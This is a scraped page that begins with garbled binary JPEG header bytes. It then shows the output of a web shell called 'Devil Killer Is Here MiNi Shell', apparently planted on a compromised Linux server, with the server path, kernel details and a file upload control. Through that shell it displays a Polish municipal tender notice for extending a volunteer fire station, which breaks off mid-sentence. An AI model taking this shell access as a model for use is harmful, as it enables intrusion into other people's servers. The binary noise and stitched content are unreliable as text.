JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210910/0017732801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa remizy OSP Pękanino </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Malechowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Malechowo</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Malechowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-142</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">943140561</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">943184305</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@malechowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.malechowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa remizy OSP Pękanino </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55bc0561-1228-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00177328</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002653/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Rozbudowa remizy OSP Pękanino</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://malechowo.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://malechowo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie<br/>Zakupowej tj.:<br/>8.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>8.2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>8.3. Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>8.4. Włączona obsługa JavaScript;<br/>8.5. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>9. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające prawidłowe<br/>złożenie podpisu elektronicznego:<br/>9.1. Rekomendowaną przeglądarką do złożenia oferty jest MS Internet Explorer lub Firefox w wersji<br/>wpieranej przez producenta.<br/>9.2. Uruchomienie oprogramowania do składania podpisu wymaga również zainstalowania Java w<br/>wersji 1.8.0_65 lub nowszej, koniecznie w wersji 32-bitowej, pozwalające na przyjmowanie przez<br/>użytkownika sesyjnych plików cookie oraz obsługującej szyfrowanie. Konieczne jest również dodanie<br/>adresu witryny platformy eZamawiający (ezamawiający.pl) do wyjątków (exception site list) w Javie.<br/>Uwaga: wymaga to uprawnień administracyjnych na komputerze.<br/>9.3. Zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za<br/>obsługę funkcjonalności podpisu elektronicznego w platformie eZamawiający. Rozszerzenie Szafir<br/>SDK można pobrać tutaj. Po zainstalowaniu rozszerzenia Szafir SDK oraz aplikacji Szafir Host należy<br/>przeładować bieżącą stronę.<br/>9.4. Przed uruchomieniem platformy eZamawiający, w pierwszej kolejności podłącz czytnik z kartą<br/>kryptograficzną do komputera.<br/>10. Informacje dotyczące odpowiedniego przygotowania stanowiska znajdą Państwa na stronie:<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki<br/>11. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB<br/>w txt, rtf, pdf , odt, ods, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, png, zip, 7z, XAdES.<br/>2. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>12.1. Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie,<br/>jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po<br/>odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>13. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">3.15.) RODO (obowiązek informacyjny): RODO (obowiązek informacyjny): 1.1. administratorem<br/>Państwa danych osobowych jest Urząd Gminy Malechowo z siedzibą w Malechowo 22A, 76-142<br/>Malechowo ;1.2. administrator wyznaczył Inspektora Danych Osobowych, adres e-mail: e-mail:<br/>iodo@malechowo.pl.1.3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, które jest<br/>prowadzone w trybie przetargu nieograniczonego;1.4. odbiorcami Państwa danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74<br/>PZP;1.5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy (art. 78 ust. 4 PZP);1.6. obowiązek<br/>podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem<br/>określonym w przepisach PZP, związanym z udziałem w niniejszym postępowaniu;1.7. w odniesieniu<br/>do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosownie do postanowień art. 22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.8. posiadają Państwo:1.8.1. zgodnie z art. 15 RODO -<br/>prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy<br/>skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego<br/>wysiłku,mogą Państwo zostać zobowiązani do wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);1.8.2. zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z<br/>tym, że skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z PZP<br/>oraz nie może naruszać integralności protokołu z postępowania oraz załączników do<br/>niego);1.8.3.zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia<br/>publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej,lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych,gdy uznają Państwo, że przetwarzanie Państwa danych osobowych narusza przepisy<br/>RODO; 1.9. nie przysługuje Państwu:1.9.1. zgodnie z art. 17 ust. 3 lit. b, d lub e RODO - prawo do<br/>usunięcia danych osobowych;1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;1.9.3.zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO; 1.9.4.<br/>przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Państwa danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIGP.2710.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest rozbudowa budynku, w którym znajduje się strażnica OSP z<br/>zapleczem. Budynek o kształcie prostokąta, przyległy częścią jednej ze ścian do istniejącego<br/>budynku świetlicy wiejskiej, obiekt o szerokości 16,95 m i długości 15,35m. Dach dwuspadowy<br/>kryty blachodachówką (dachówką) . Nad garażem dla wozu strażackiego wyższy bez stropu nad<br/>przyziemiem, nad zapleczem niższy. Budynek zaopatrzony w dwa wejścia, główne od frontu<br/>poprzez salę szkoleniową i jadalnie, Charakterystyczne parametry budynku: Powierzchnia<br/>zabudowy: 259,60 m2; Powierzchnia użytkowa: 377,39 m2; Długość i szerokość: 15,35<br/>x16,95m; Wysokość zabudowy: 7,75 m; Kubatura brutto: około 1375 m3. Wykonanie nowych<br/>instalacji sanitarnych i elektrycznych. Zamówienie nie obejmuje wykonania<br/>parkingu.2.Szczegółowy opis przedmiotu zamówienia zawierają załączniki: Projekt Umowy –<br/>załącznik nr 6do SWZ, Opis przedmiotu zamówienia – Dokumentacja projektowa załącznik nr 7<br/>do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">najkorzystniejsza zostanie oferta niepodlegająca odrzuceniu, która<br/>uzyska najwyższą liczbę punków.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunku w tym zakresie<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w tym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>1) W postępowaniu może brać udział Wykonawca, który jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia tj. w<br/>zakresie robót budowlanych z sumą gwarancyjną na jedno i wszystkie zdarzenia nie mniejszą<br/>niż 1.000.000,00 PLN. Jeżeli suma ubezpieczenia wyrażona jest w innej walucie, dla potrzeb<br/>sprawdzenia spełniania warunku, podana wartość zostanie przeliczona według kursu średniego<br/>NBP obowiązującego na dzień publikacji ogłoszenia o zamówieniu.<br/>d) zdolności technicznej lub zawodowej:<br/>1.) W postępowaniu może brać udział Wykonawca, który dysponuje lub będzie dysponował co<br/>najmniej następującymi osobami, które zostaną skierowane do realizacji przedmiotowego<br/>zamówienia (przy bezpośredniej realizacji zamówienia), o minimalnych poniższych<br/>kwalifikacjach niezbędnych do wykonania zadania:<br/>- Kierownik budowy:<br/>a) osoba posiadająca uprawnienia konstrukcyjno - budowlane bez ograniczeń do pełnienia<br/>samodzielnych funkcji technicznych w budownictwie zgodnie z ustawą z dnia 7 lipca 1994r.<br/>Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.) tj. do kierowania robotami budowlanymi w<br/>specjalności konstrukcyjno-budowlanej<br/>b) osoba wpisana na dzień składania ofert na listę członków właściwej izby samorządu<br/>zawodowego;<br/>Powyższe wymagania muszą być spełnione łącznie.<br/>UWAGA: Zamawiający, określając wymogi w zakresie posiadania uprawnień budowlanych (w<br/>tym przynależności do określonego samorządu zawodowego) na podstawie (art. 12a) ustawy z<br/>dnia 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2020 r. poz. 1333. ze zm.) dopuszcza<br/>odpowiadające im uprawnienia budowlane wydane na podstawie uprzednio obowiązujących<br/>przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym<br/>Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do<br/>wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te<br/>kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia 2015r. o<br/>zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (Dz. U. z 2020 r. poz. 220. ze zm.).<br/>2.) W postępowaniu może brać udział Wykonawca, który w okresie ostatnich pięciu lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej 1<br/>zamówienie polegające na robotach ogólnobudowlanych (budowa lub przebudowa) budynków<br/>użyteczności publicznej o wartości robót budowlanych minimum 500.000,00 zł brutto (słownie:<br/>pięćset tysięcy złotych brutto).<br/>Zamawiający informuje, iż na potrzeby nn postępowania pod pojęciem „budynku użyteczności<br/>publicznej” użytym w nn SWZ - należy rozumieć budynek użyteczności publicznej oraz budynek<br/>zamieszkania zbiorowego w rozumieniu Rozporządzenia Ministra Infrastruktury z dnia 12<br/>kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich<br/>usytuowanie (Dz.U. 2002 nr 75 poz. 690) tzn.<br/>- budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury,<br/>kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej,<br/>społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych<br/>lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym,<br/>drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do<br/>wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek<br/>biurowy lub socjalny,<br/>lub<br/>- budynek przeznaczony do okresowego pobytu ludzi, w szczególności hotel, motel, pensjonat,<br/>dom wypoczynkowy, dom wycieczkowy, schronisko młodzieżowe, schronisko, internat, dom<br/>studencki, budynek koszarowy, budynek zakwaterowania na terenie zakładu karnego, aresztu<br/>śledczego, zakładu poprawczego, schroniska dla nieletnich, a także budynek do stałego pobytu<br/>ludzi, w szczególności dom dziecka, dom rencistów i dom zakonny.<br/>2. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie złożonych przez<br/>Wykonawcę oświadczeń i dokumentów, zgodnie z rozdziałem VIII SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>sporządzone nie wcześniej niż3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, które zostaną skierowane do realizacji przedmiotowego zamówienia (przy bezpośredniej<br/>realizacji zamówienia) potwierdzający spełnianie warunku opisanego w rozdz. VI ust. 1, pkt d). 1) SWZ<br/>– wg wzoru na załączniku nr 4 do SWZ. Wykaz robót budowlanych w zakresie wskazanym w rozdz. VI<br/>ust. 1 pkt d). 2) SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem rodzaju, wartości, daty,<br/>miejsca wykonania i podmiotów, na rzecz których robota ta została wykonana,z załączeniem dowodów<br/>określających czy robota budowlana została wykonana należycie (dowodami,o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty) – załącznik nr 5 do SWZ . Polisa lub inny dokument<br/>potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie i na<br/>warunkach określonych w rozdziale VI pkt. c).2) SWZ ze wskazaniem sumy gwarancyjnej tego<br/>ubezpieczenia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> załącznik nr 3 do SWZ formularz cenowy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> W niniejszym postępowaniu Zamawiający przewiduje obowiązek wniesienia wadium. / Łączna<br/>wysokość wadium wynosi 9 000,00 zł (słownie dziewięć tysięcy i 00/100 zł). 2. Wadium<br/>przetargowe należy 